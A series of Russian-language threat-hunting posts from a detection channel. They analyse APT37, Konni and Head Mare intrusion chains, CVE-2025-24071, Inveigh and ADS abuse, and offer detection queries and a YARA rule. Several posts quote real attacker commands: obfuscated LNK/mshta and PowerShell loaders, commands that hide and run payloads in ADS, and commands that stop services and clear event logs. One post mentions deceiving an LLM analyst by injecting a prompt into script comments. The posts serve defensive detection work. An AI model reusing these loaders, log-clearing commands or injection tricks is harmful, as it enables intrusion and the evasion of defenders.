В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)

🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud

Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK

#ttp@detectioneasy
#detection@detectioneasy

Вышел релиз Cobalt Strike 4.11, много интересных изменений. Меня больше зацепило использование DNS over HTTPS (DoH) для взаимодействия с сервером. Готовы к обнаружению?)

Список публичных DoH/DoT резолверов и еще один

Список всех обновлений CS 🐎 можно найти здесь

#ttp@detectioneasy

Очередной NTLM Response disclosure (CVE-2025-24071), вначале было интересно) сейчас хочется верить, что у всех закрыт доступ на внешние smb

Можем обнаружить 🔭:

🔤 В логах Security и Sysmon поискать сессии к порту 445

ProviderName="Microsoft-Windows-Security-Auditing" and EventId=5156 and DestAddress not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestPort=445
  

ProviderName="Microsoft-Windows-Sysmon" and EventId=3 and DestinationIp not in [10.0.0.0/8
, 172.16.0.0/12, 169.254.0.0/16] and DestinationPort=445

🔤 создание файла с раширением .library-ms

ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith  "\\Users\\.*\.library-ms"

🔤 yara имеет смысл поискать в директориях пользователея (проверил, не фолсило)

rule detect_malicious_library_ms {
    meta:
        description = "Detects library-ms files with a search connector pointing"
        author = "@d3f0x0 @detectioneasy"
        reference = "CVE-2025-24071"
        date = "2025-03-19"
        score = 80

    strings:
        $xml_decl = /<\?xml\s+version\s*=\s*["']1\.0["']\s+encoding\s*=\s*["']UTF-8["']\s*\?>/ nocase
        
        $namespace = "http://schemas.microsoft.com/windows/2009/library"
        
        $url_pattern1 = /<url\b[^>]*>\s*\\\\/ wide ascii
        $url_pattern2 = /<\/url>/ wide ascii

        $connector_open = "<searchConnectorDescription>" wide ascii
        $connector_close = "</searchConnectorDescription>" wide ascii

    condition:
        all of ($xml_decl, $namespace, $url_pattern1, $url_pattern2 ) and
        2 of ($connector_open, $connector_close)
}

#detection@detectioneasy

Всем привет ✌️
Многими любимый Responder получил свое отражение на Powershell и C# в проекте Inveigh

Атакующие стараются не использовать его plaintext'ом и обфусцируют powershell или используют свой интерпретатор

Если Вам попались ребята, которые просто сделали git clone или скачали Release 👶 , проблем с ними нет

🔭 Обнаруживаем:
🔤 создание файлов с именем Inveigh
🔤 в логах Powershell вхождение inveigh, relay

Если хакеры подготовились обфусцировались, принесли с собой свой интерпретатор powershell:

🔤 Скорее всего оставили стандартное название логов, отслеживаем создание файлов по маскам

    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
    $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"

🔤 если уже сильно запарились, и все поменяли, то формат хранения NTLMv2 Response, вряд ли будут менять, и в целом лог работы программы, поэтому берем строки вывода логов из скрипта формируем в yara и идем в поход по директориям пользователей

🔤 и для самых крутых, отойдем от tool-based, поднимемся выше по пирамиде боли к TTP 🤘

❗️ Суть атаки авторизовать на себя как можно больше хостов, для этого нужно поднять определенные сервера и заставить других клиентов подключаться к себе

Скорее всего подобного рода утилиты будут применяться в начале killchain для сбора учетных записей и информации об окружающей среде. Это дает нам вариант для профилирования поведения хостов.

🔤 Если у вас увеличилось количество подключений к хосту или в целом забиндились новые порты на пользовательских тачках - стоит проверить процесс, к которому подключаются.

🔤 Или наоборот, если хосты в широковещательном домене начали неожиданно подключаться к одному из хостов - необходимо его проверить

#detection@detectioneasy

Всем привет! ✌️

Прочитал статью от PT про внедрение LLM-агентов 🤖. Одно из направлений — это асистент для аналитика, интегрированный в SIEM или SOAR.

Встроенные агенты могут ускорить анализ скриптов, рассказать какие функции есть, попытаться снять обфускацию, дать описание аргументам командой строки или процессам.

В посте раннее получилось обмануть Deepseek внедрением промта в комментарии к скрипту. Что создает вектор для обхода средств обнаружения (обмана аналитика).

Внедрение агента в средства обнаружения может отрицательно повлиять на молодого аналитика и вызвать у него излишнее доверие к результатам. Это может быть следствием психологического феномена automation bias.

Automation bias понимают неосознанную склонность человека слепо доверять решениям, предлагаемым компьютером, особенно если они связаны с выполнением рабочей функции. При этом могут игнорироваться другие показатели, противоречащие рекомендации машины.

В OWASP Ttop 10 LLM - выделяли обман (дезинформация) в отдельную уязвимость.

Misinformation from LLMs poses a core vulnerability for applications relying on these models.
Misinformation occurs when LLMs produce false or misleading information that appears credible.
This vulnerability can lead to security breaches, reputational damage, and legal liability.

Одно из решений этой проблемы - внедрение ловушек в выдачу агента, чтобы поддерживать аналитика в тонусе.

#detection@detectioneasy

Всем привет! ✌️

Что делать, если пользователь удалил фишинговый файл 📬?) или атакующие стерли следы компрометации? 😐

Давайте обратимся к MSDN и вспоним, что такое файл в NTFS.

Файл — это единица данных в файловой системе, к которым пользователь может получить доступ и управлять ими. Файл должен иметь уникальное имя в своем каталоге. Он состоит из одного или нескольких потоков байтов, которые содержат набор связанных данных, а также набор атрибутов (также называемых свойствами), описывающих файл или данные в файле.

На картинке представлен файл с одним основным потоком и двумя альтернативными.

На основе этого мехнизма работает служба Attachment Execution Service.

Когда файл сохраняется ему добавляются альтернативные потоки:
🔤 ZoneID - число, указывающее Security Zone, из которой был получен файл. Вот возможные значения:
0 – My Computer (local files)
1 – Intranet (internal network)
2 – Trusted sites
3 – Internet (most web downloads)
4 – Untrusted (flagged as risky by Microsoft SmartScreen)
🔤 ReferrerURL - веб-сайт, с которого был загружен файл
🔤 HostURL - прямая ссылка для скачивания

Информацию о создании ADS можно увидеть в событии Sysmon - 15, если забыли настроить в MFT.

Таким образом мы можем сформулировать хант:

Атакующие нас пробили через фишинг. Пользователь удалил файл после открытия или хакеры удалили за собой файл. Найдем упоминания ReferrerURL/HostURL

Нам нужно:
🔤найти все созданные упоминания об ADS в событиях или в MFT
🔤определить расширения файлов, которые нас интересуют (можем воспользоваться https://filesec.io/)
🔤 провести анализ
🔤 или сгруппировать найденные url и проверить их репутацию

#detection@detectioneasy

Продолжим тему с ADS 💻

ADS для хакеров отличное место, для хранения нагрузки, создание потока несильно шумное событие. А запуск нагрузки из ADS может и не привлечь внимания 🤔

Для создания потока мы можем выполнить команду:

type C:\windows\system32\calc.exe > c:\users\qwer\downloads\cv.doc:calc.exe

Чтобы запустить процесс воспользуемся командой:

wmic process call create c:\users\qwer\downloads\cv.doc:notepad.exe

Как знаем из предыдущего поста создание ADS регистрируется событием Sysmon EventId = 15

Нас может заинтересовать:
🔤 создание потока подозрительным процессом, например не браузером

🔤 использовать хеши в качестве индикаторов. В поле Hash хранится хеш-значение данных в потоке

🔤 поле Contents может быть пустым. в примере на скриншоте в поток был записан бинарный файл. Понять было ли что-то записано в поток, нам поможет наличие значения в поле Hash

Второе событие которое нам поможет это создание процесса:

🔤 в поле CommandLine ищем использование символа ":" , могут быть специфичные процессы, где будет использоваться этот символ, но можем их отфильтровать

#detectioneasy@detection

Всем привет! ✌️
The DFIR Report порадовали нас новым отчетом Fake Zoom Ends in BlackSuit Ransomware

🔭 Для хантинга похожей активности можем:

🔤 отслеживать события создания файла клиента Zoom, Talk etc и проверять значения полей HostURL или ReferrerURL из события создания ADS

🔤 отслеживать создание процесса клиента, с пустой метаинформацией (не заполнен автор продукта, отсутствует цифровая подпись)

🔤 отслеживать создание/запуск несанкционированных bat/cmd скриптов

🔤 отслеживать добавление исключений в Defender, используя коммандлет Add-MpPreference

🔤 отслеживать запуск команд timeout, ping, tar, net group, whoami, systeminfo, nltest /dclist

🔤 для горизонтального передвижения использовали PSExec и RDP. Можем отслеживать создание подозрительных сессий.

Для ханта RDP можем собрать события 4624 с logontype 3 и 10, событие 1149 (Terminal-Services-RemoteConnectionManager/Operational). Выделить с каких адресов/аккаунтов выполняли/пытались подключиться по RDP

#detection@detectioneasy

Сегодня, поговорим о группировке Head Mare 💻

🔤 хакеры присылают фишинговое письмо с запароленным архивом. вышеописанный архив - это полиглот - EXE/ZIP. В архиве находится LNK-файл с расширением - PDF

🔤 При запуске LNK-файла выполнится следующая команда, которая найдет путь к архиву, выполнит его как исполняемый файл. Далее отрежет часть архива и запустит pdf-decoy-файл

powershell.exe -WindowStyle hidden -c "$r=$(Get-Location).Path + '\Заявка_[REDACTED]_5_03Д.zip';
 
if(Test-Path $r) {
 cmd.exe /c start /B $r;
} else {
 $f=$(Get-ChildItem -Path '%userprofile%' -Recurse -Filter 'Заявка_[REDACTED]_5_03Д.zip' | Select-Object -First 1);
 if($f) {
      $r=$f.FullName; cmd.exe /c start /B $f.FullName;
 };
};
if(-Not (Test-Path $r)) {
 $r=$(Get-ChildItem -Path '%temp%' -Recurse -Filter
      "Заявка_[REDACTED]_5_03Д.zip" | Select-Object -First 1).FullName;
};
[System.IO.File]::WriteAllBytes(
 [System.IO.Path]::Combine('%temp%','Заявка_[REDACTED]_5_03Д.pdf'),
 ([System.IO.File]::ReadAllBytes($r) | Select-Object -Skip 7166046 -First 147100)
);
Start-Process -FilePath $([System.IO.Path]::Combine('%temp%', 'Заявка_[REDACTED]_5_03Д.pdf'));

🔤 архив содержит Python-бекдор собранный PyInstaller'ом. Скрипт отправляет на C2 информацию о себе, и получает статус об успешной регистрации бота

🔤 далее выполнялись команды для сбора информации о системе, и в некоторых случаях устанавливался Meshagent

Что можно похантить?) 🔭
🔤 если у Вас не заблокирована пересылка архивов с паролем, и письма где-то хранятся. Ищем письма в которых содержится слово пароль и (ссылка или вложение). Хакеры часто используют пароль для архивов или облака, чтобы обойти песочницу и почтовые шлюзы

🔤 Проверяем в событиях Powershell наличие командлетов ReadAllBytes, System.IO.Path, Combine

🔤 запуск архива, странным способом в данном случае start

🔤 проверяем создание дирректорий Python

🔤 проверяем отсутствие процессов с именем MeshAgent.exe и служб с именем или описанием Mesh Agent

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! ✌️
ЛК поделись инструментарием Head Mare

mimikatz - дамп кред
ADRecon - сбор информации о домене
secretsdump - дамп кред
ProcDump - дамп процессов
Localtonet - построение тоннелей
revsocks - построение тоннелей
ngrok - построение тоннелей
cloudflared - построение тоннелей
Gost - построение тоннелей
fscan - сканер
SoftPerfect Network Scanner - сканер
mRemoteNG - менеджер удаленных подключений
PSExec - PSExec 😇
smbexec - скрипт из Impacket
wmiexec - скрипт из Impacket
LockBit 3.0 - ransomware
Babuk - ransomware

Из инструментария можем увидеть, что хакеры совсем не брезгуют использовать opensource. Скрипты из набора Impacket - уже стали musthave, от которого сложно избавиться.

🔤 Фишинг и компрометация сетей подрядчиков. Эксплуатация уязвимостей CVE-2023-38831 в WinRAR, CVE-2021-26855 - Microsoft Exchange.

🔤 Для закрепления в инфраструктуре хакеры создавали локальных пользователей, строили тоннели, и закрепляли их при помощи Non-Sucking Service Manager (NSSM), который позволяет запускать любое приложение как сервис Windows.

🔤 Для обхода обнаружения злоумышленники использовали имена системных файлов для своих нагрузок, wusa.exe, calc.exe, winuac.exe, winsw.exe. Переименовывание системных утилит, например cmd.exe в log.exe

🔤Остановка служб журналирования и очистка логов

stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }

🔤 Загрузка новых PE-файлов с C2. Можем отслеживать событие Sysmon - Event ID 29: FileExecutableDetected

🔤 Использование утилит для построения тоннелей

🔤 Для перемещения в инфраструктуре использовались mRemoteNG, smbexec, wmiexec, PAExec и PsExec

#detection@detectioneasy
#ttp@detectioneasy

Всем привет!) ✌️💻
Оформил результаты публикаций за Q1 в небольшой журнал)
надеюсь понравится

Всем привет! ✌️

Давайте сегодня посмотрим отчет, связанный с TTP Konni APT

🔤 Первый LNK запускает mshta.exe со следующими аргументами:

javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x08e4)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x17cb;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"3246 0;"+a+"-f $w;";eval(s);

🔤 Скрипт выполняет поиск LNK-файла, сначала в текущей директории, потом в TEMP. LNK-файла должен быть определенного размера

🔤 Из найденного LNK извлекается PowerShell- скрипт и сохраняется в ProgramData\e.ps1

Хакеры часто используют самоизвлекающиеся LNK-файлы, чтобы доставить второй этап атаки

🔤 e.ps1 обфусцированный скрипт, который обращается на C2 и загружает с dropbox архив

🔤Для закрепления хакеры использовали планировщик задач и ключ реестра Run

🔤 Также скрипт получает c С2 текст, кодированный Base64 и выполняет его


🔭 Для обнаружения:

🔤 отслеживаем создание LNK и PS1 файлов в директориях пользователя

🔤 в аргументах Powershell ищем -Encoding Byte, DecodeByte. Можем поискать в логах Powershell или аргументах наличие Base64-строк

🔤 отслеживаем создание новых задач в журнале Security EventId = 4698. В данном событии содержится xml созданной задачи.

Для хантинга:

🔤 можем собрать и спарсить все задачи пользователей, и проанализировать Автора, Исполняемый файл, Аргументы

🔤 наличие в ключах реестра Run скриптов

#ttp@detectioneasy
#detection@detectioneasy

Всем привет! 💻✌️

Продолжим обзор Konni APT

В постах раннее мы увидели, что Konni используют фишинг для получения доступа и длинные multistage цепочки из lnk bat powershell autoit и других исполняемых файлов

В отчете от Cyfirma аналитики объясняют страсть к lnk следующими возможностями Windows 📄:

скрытие расширения файла в проводнике Windows и ограничение отображения аргументов в 260 символов в файлах LNK

Уже не секрет, что если вставить много пробелов в названии файлов, то расширение не будет видно в проводнике, а для LNK расширение не отображается, даже если включить в настройках проводника опцию - Отображать известные расширения файлов. Включить отображение LNK можно поправив ключ в реестре.

⚠️ Еще одна особенность проводника в отображении свойств LNK-файлов - отображается только 260 символов из поля Аргументы.

Давайте перейдем к самой атаке:

🔤 Атака началась с фишинга, ZIP с DOCX.LNK и 2 PDF-файла. Хакеры воспользовались пробелами в аргументах LNK, чтобы остаться незамеченными

🔤 Команда в LNK - это обфусцированный cmd+powershell скрипт

🔤 Вначале CMD-скрипт ищет интерпретатор Powershell и запускает его

🔤 Хакеры в очередной раз используют self-extracted lnk, в этом случае для открытия docx - decoy-файла (странное поведение, у них в архиве было еще 2 pdf....)

🔤Далее по другому смещению из LNK извлекается CAB-файл и vbs-скрипт в директорию C:\Users\Public\Documents

🔤VBS-скрипт извлекает файлы из CAB

🔤 Из CAB извлекается семь bat-файлов, которые продолжают вредоносную цепочку

🔤 И классика, в качестве закрепа в ключ реестра Run добавляется vbs

🔭 Для обнаружения, в дополнение к посту ранее:

🔤 запуск офисных документов не проводником, и не браузером и не почтовым клиентом или запуск офисных документов скриптами

🔤 создание bat-файлов

🔤 добавление скриптов в ключи реестра для автозапуска

🔤 создание CAB-файлов в директориях пользователя

🔤 создание файлов в C:\Users\Public. Наверное может получится неплохой хант, если начать анализировать файлы в сабдиректориях)

PT ESC недавно писали как хакеры ломают парсеры LNK-файлов, чтобы остаться незамеченными

#detection@detectioneasy
#ttp@detectioneasy